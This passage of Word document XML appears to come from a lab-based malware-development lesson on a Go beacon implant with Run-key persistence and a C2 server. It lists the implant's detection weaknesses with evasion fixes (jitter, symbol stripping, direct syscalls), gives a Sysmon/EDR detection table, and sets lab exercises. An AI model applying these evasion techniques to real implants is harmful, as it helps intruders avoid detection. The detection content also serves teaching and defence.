        </w:rPr>
        <w:t xml:space="preserve">The string ReconBeacon is a static indicator of compromise (IoC). Any EDR rule or Autoruns scan looking for this string will find the persistence. Fix: randomise or encode the value name at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Regular Beacon Interval</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A fixed 60-second beacon creates a detectable pattern in network flow logs. Network IDS tools like Zeek and Suricata have beacon detection modules that specifically look for periodic outbound connections. Fix: add random jitter to the sleep interval (Obfuscation Lesson 2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Debug Symbols in Binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A Go binary compiled without flags includes full debug symbols and function names. Running Ghidra, Binary Ninja, or objdump on the binary reveals function names like sendToC2 and variable names from the source. Fix: compile with -ldflags="-s -w" (Obfuscation Lesson 3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 cmd.exe Child Process Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every exec.Command call spawns cmd.exe as a child process. The parent-child chain (payload.exe → cmd.exe → systeminfo.exe) is a well-known detection signature. A more advanced implementation would use Windows API calls directly via the syscall package rather than shelling out to cmd.exe.</w:t>
      </w:r>
    </w:p>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6. Detection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Detection Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="656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Sysmon EventID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cmd.exe child of payload — parent image path anomaly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Sysmon EventID 13</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Registry write to HKCU\...\Run — extremely high-signal detection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Sysmon EventID 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create at C:\temp\recon_combined.txt every 60 seconds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Sysmon EventID 3</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Network connection to 192.168.1.10:5000 every 60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Network IDS (Zeek/Suricata)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Periodic beacon detection: same dst IP, same dst port, fixed ~60s interval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Autoruns.exe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ReconBeacon value under HKCU Run key — highlighted as unknown/unsigned binary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AV (static)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SHA-256 hash of .exe — flagged after first submission to VirusTotal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EDR process tree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6+ cmd.exe children in rapid succession on process spawn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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7. Exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run Version 3 on your lab machine. Open Autoruns.exe (Sysinternals) and verify the ReconBeacon Run key entry appears. Confirm that after a simulated reboot (log off and back on), the beacon starts automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor the C2 uploads/ directory during a 5-minute window. How many beacon files arrive? Calculate the actual interval between arrivals — is it exactly 60 seconds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Wireshark to capture 3 successive beacons. Export the timing data. Plot the inter-beacon interval. What would this look like to a Zeek beacon detection script?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually delete the Run key entry (reg delete HKCU\...\Run /v ReconBeacon /f). Then restart the payload. Observe that it re-creates the entry on every execution — there is no first-run guard. As an improvement, add a check: only run the reg add command if the key does not already exist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings.exe on the compiled v3.exe binary. List every hardcoded string that is an operational indicator of compromise. This list becomes the input for the string obfuscation lesson.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Compare the file sizes of v1.exe, v2.exe, and v3.exe compiled with -ldflags="-s -w" vs without. Document the size difference and explain what information is removed by the flags.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2026-03-30T18:12:37.464Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-30T18:12:37.464Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>